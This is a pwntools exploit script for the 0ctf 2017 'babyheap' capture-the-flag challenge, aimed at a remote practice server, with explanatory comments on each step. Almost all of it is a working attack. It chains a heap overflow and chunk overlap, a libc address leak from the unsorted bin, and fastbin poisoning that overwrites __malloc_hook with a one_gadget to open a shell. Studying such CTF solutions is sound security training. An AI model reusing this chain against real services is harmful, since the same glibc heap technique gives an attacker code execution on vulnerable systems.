from pwn import *
from LibcSearcher import *
# Session setup: pwntools context, the challenge binary, the remote endpoint
# and the libc build that the symbol lookups below are resolved against.
context.log_level = 'debug'
context.arch = 'amd64'
context.os = 'linux'
pwnfile = "./0ctf_2017_babyheap"
io = remote("node4.buuoj.cn", 28243)
# io = process(pwnfile)  # local run against the binary, currently disabled
elf = ELF(pwnfile)
libc = ELF("./libc-2.23_64.so")
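def add(size):
    """Request an allocation of ``size`` bytes via menu command 1.

    Drives the target's text menu over the global tube ``io``: waits for the
    ``Command: `` prompt, selects option 1, then answers the ``Size: ``
    prompt. Nothing is returned; the script tracks chunk indices by call
    order (see the ``#0``, ``#1`` ... comments at the call sites).
    """
    io.sendlineafter(b"Command: ", b"1")
    # Encode explicitly so every write to the tube is bytes, matching the
    # literal prompts/commands, instead of relying on pwntools' implicit
    # str -> bytes conversion.
    io.sendlineafter(b"Size: ", str(size).encode())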
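def edit(idx, size, data):
    """Write ``data`` into chunk ``idx`` via menu command 2.

    Answers the ``Index: ``, ``Size: `` and ``Content: `` prompts in turn on
    the global tube ``io``. ``data`` is sent with ``send`` (no trailing
    newline), so the target sees exactly the bytes passed in; callers in
    this script always pass ``len(data)`` as ``size``.
    """
    io.sendlineafter(b"Command: ", b"2")
    # Numeric answers are encoded explicitly to keep every tube write bytes.
    io.sendlineafter(b"Index: ", str(idx).encode())
    io.sendlineafter(b"Size: ", str(size).encode())
    io.sendafter(b"Content: ", data)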
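def free(idx):
    """Release chunk ``idx`` via menu command 3.

    Waits for the ``Command: `` prompt on the global tube ``io``, selects
    option 3 and answers the ``Index: `` prompt. Returns nothing.
    """
    io.sendlineafter(b"Command: ", b"3")
    # Encoded explicitly so the write is bytes like the command literal.
    io.sendlineafter(b"Index: ", str(idx).encode())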
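def show(idx):
    """Ask the target to print chunk ``idx`` via menu command 4.

    Only issues the request on the global tube ``io``; the caller is
    responsible for reading the response (see the ``recvuntil`` after the
    ``show(2)`` call in the main script).
    """
    io.sendlineafter(b"Command: ", b"4")
    # Encoded explicitly so the write is bytes like the command literal.
    io.sendlineafter(b"Index: ", str(idx).encode())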
# Main sequence. Every line is one menu interaction on the global tube `io`
# and the order is load-bearing: later steps depend on the heap state left
# by earlier ones, so do not reorder.
add(0x10)#0
add(0x10)#1
add(0x10)#2
add(0x10)#3
add(0x80)#4
free(1)
free(2)
# 65 bytes are written through chunk 0, which was requested with size 0x10;
# presumably the target's edit does not bound the write — confirm against the binary.
payload = p64(0)*3 + p64(0x21) + p64(0)*3 + p64(0x21)+p8(0x80)
edit(0,len(payload),payload)
payload = p64(0)*3 + p64(0x21)
edit(3,len(payload),payload)
add(0x10) #1
add(0x10) #2
payload = p64(0)*3 + p64(0x91)
edit(3,len(payload),payload)
add(0x80) #5 allocate a large chunk so chunk 4 does not merge with the top chunk
free(4)
show(2)
# Leak: read up to the first 0x7f byte and reinterpret the 6 bytes ending there
# as a little-endian 8-byte value. The 88 and 0x10 adjustments are presumably
# specific to the bundled libc-2.23 build — verify if the libc changes.
# NOTE(review): the delimiter is a str literal while the rest of the script
# uses bytes; pwntools encodes it, but b'\x7f' would be consistent.
__malloc_hook = u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\0')) - 88 - 0x10
libc_base = __malloc_hook - libc.symbols["__malloc_hook"]
log.info("__malloc_hook: "+ hex(__malloc_hook))
log.info("libc_base: "+ hex(libc_base))
add(0x60)
free(4) # effectively a split: the 0x80 chunk becomes 0x60 in the fastbin and 0x20 in the unsorted bin
# NOTE(review): the -35 offset depends on the libc's memory layout — confirm
# against ./libc-2.23_64.so before reusing with another build.
payload = p64(__malloc_hook - 35)
edit(2,len(payload),payload)
add(0x60)
add(0x60) # this allocation returns the fake chunk
payload = b'a'*(0x8+0x2+0x8+1)
# 0x4526a is an offset into the loaded ./libc-2.23_64.so; presumably not
# portable to other libc builds.
payload += p64(libc_base+0x4526a)
edit(6,len(payload),payload)
# Final allocation request (size 79), then hand the tube to the user.
add(79)
io.interactive()